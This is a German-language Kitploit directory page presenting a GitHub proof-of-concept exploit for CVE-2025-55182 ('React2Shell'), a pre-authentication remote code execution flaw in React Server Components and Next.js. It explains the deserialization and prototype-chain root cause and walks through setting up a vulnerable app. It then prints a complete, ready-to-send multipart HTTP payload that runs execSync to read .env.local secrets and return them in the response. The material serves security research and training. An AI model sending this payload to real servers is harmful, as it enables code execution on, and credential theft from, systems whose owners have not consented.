Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/koadt/poc-cve-2025-55182
Dynamische Analyse (Sandboxing)SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungPayload-EntwicklungLabs & Praxis
GitHubkoadt/poc-cve-2025-55182

poc-cve-2025-55182

1536vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Dieses Repository enthält einen POC von CVE-2025-55182, einer kritischen (CVSS-Score 10.0) Pre-Authentication-Remote-Code-Execution-Schwachstelle, die React Server Components betrifft, auch bekannt als React2Shell.

Repository anzeigenWebseite
Teilen

CVE-2025-55182 (React2Shell) – Proof of Concept

⚠️ WARNUNG: Dieses Repository dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Nutzen Sie diesen Exploit nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Übersicht

Dieses Repository enthält eine Proof-of-Concept-Demonstration von CVE-2025-55182, einer kritischen, vor der Authentifizierung ausnutzbaren Remote-Code-Ausführungsschwachstelle, die React Server Components betrifft.

CVSS-Score: 10,0 (Kritisch)

Betroffene Versionen:

  • React Server Components 19.0.0, 19.1.0, 19.1.1 und 19.2.0
  • Pakete: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack

Zusammenfassung der Schwachstelle

CVE-2025-55182 ist eine unsichere Deserialisierungsschwachstelle in der Flight-Protokoll-Implementierung von React Server Components. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebigen JavaScript-Code auf dem Server auszuführen, indem sie manipulierte Payloads erstellen, die Prototype-Chain-Traversal und unsichere Property-Zugriffsmuster ausnutzen.

Ursache

Die Schwachstelle beruht darauf, wie React Server Components Flight-Protokoll-Payloads deserialisieren. Bei der Verarbeitung von Modulreferenzen verwendet der Code die Bracket-Notation, um auf Eigenschaften zuzugreifen (moduleExports[metadata[2]]), was die gesamte JavaScript-Prototype-Kette durchläuft. Dies ermöglicht es Angreifern, auf Eigenschaften zuzugreifen, die nicht explizit exportiert wurden, einschließlich der Eigenschaft constructor, die Zugriff auf den globalen Function-Konstruktor bietet.

Durch die Verkettung von Prototype-Pollution-Techniken mit den internen Chunk-Verarbeitungsmechanismen von React kann ein Angreifer einen Payload erstellen, der letztendlich über den Function-Konstruktor beliebigen Code ausführt.

Voraussetzungen

  • Burp Suite Community oder Professional (oder ein beliebiger HTTP-Proxy/Client)
  • Eine anfällige Version von React.js oder Next.js

Setup-Anleitung

Schritt 1: Erstellen Sie ein anfälliges Projekt

Erstellen Sie ein neues Projekt mit einer Version, die die anfälligen React Server Components enthält:

root@kitploit:~
npx [email protected] poc-react2shell
cd poc-react2shell

Oder verwenden Sie dieses Repository.

Schritt 2: Erstellen Sie eine Testumgebungsdatei

Erstellen Sie eine .env.local-Datei im Projektstammverzeichnis, um die Auswirkungen der Schwachstelle zu demonstrieren:

root@kitploit:~
SECRET_API_KEY=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Schritt 3: Starten Sie den Entwicklungsserver

Starten Sie den Next.js-Entwicklungsserver:

root@kitploit:~
npm run dev

Der Server sollte unter http://localhost:3000 starten.

Exploitationschritte

Schritt 4: Senden Sie den schädlichen Payload

  1. Gehen Sie in Burp Suite zum Reiter Repeater
  2. Setzen Sie die Ziel-URL auf http://localhost:3000/
  3. Kopieren Sie den gesamten Payload und fügen Sie ihn in das Request-Fenster ein
  4. Senden Sie ab
Zum Erweitern klicken
root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 752

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('cat .env.local',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Schritt 5: Analysieren Sie die Antwort

Die Antwort sollte den Inhalt Ihrer .env.local-Datei im Antworttext enthalten:

Antwort

Payload

Der Payload besteht aus drei Multipart-Formularfeldern:

Feld 0: Ein gefälschtes Chunk-Objekt, das Folgendes enthält:

  • Prototype-Pollution-Referenzen ($1:__proto__:then)
  • Eine Blob-Referenz ($B1337), die den Exploit auslöst
  • Ein manipuliertes _response-Objekt mit bösartigem _prefix und _formData.get

Feld 1: Ein Verweis auf Feld 0 ($@0)

Feld 2: Ein leeres Array ([])

Der schädliche Code in _prefix liest .env.local mit Node.js child_process.execSync und bettet das Ergebnis in einen Error-Digest ein.

Auswirkungen

Diese Schwachstelle ermöglicht Angreifern Folgendes:

  • Ausführung beliebigen Codes auf dem Server
  • Auslesen sensibler Dateien (Umgebungsvariablen, Konfigurationsdateien usw.)
  • Erstellen von Reverse-Shells
  • Exfiltrieren von Daten
  • Durchführung aller Operationen, für die der Node.js-Prozess Berechtigungen hat

Referenzen

  • CVE-2025-55182 Details
  • Next.js-RSC-RCE-Scanner-CVE-2025-66478
  • React Security Advisory
  • Facebook Security Advisory
  • CISA Known Exploited Vulnerabilities Catalog
  • react2shellcve202555182

Üben Sie diese CVE in einem realistischen Szenario

Möchten Sie CVE-2025-55182 in einer praktischen CTF-Umgebung ausnutzen? Werfen Sie einen Blick auf OSS OopsSec Store, ein absichtlich anfälliges Labor für offensive Sicherheitsschulungen. Diese CVE ist als eines der Flags implementiert!


Haftungsausschluss

Dieser Proof of Concept dient ausschließlich zu Bildungszwecken und für Sicherheitsforschung. Stellen Sie immer sicher, dass Sie eine ausdrückliche schriftliche Erlaubnis haben, bevor Sie Sicherheitsschwachstellen auf einem System testen.

Tool herunterladen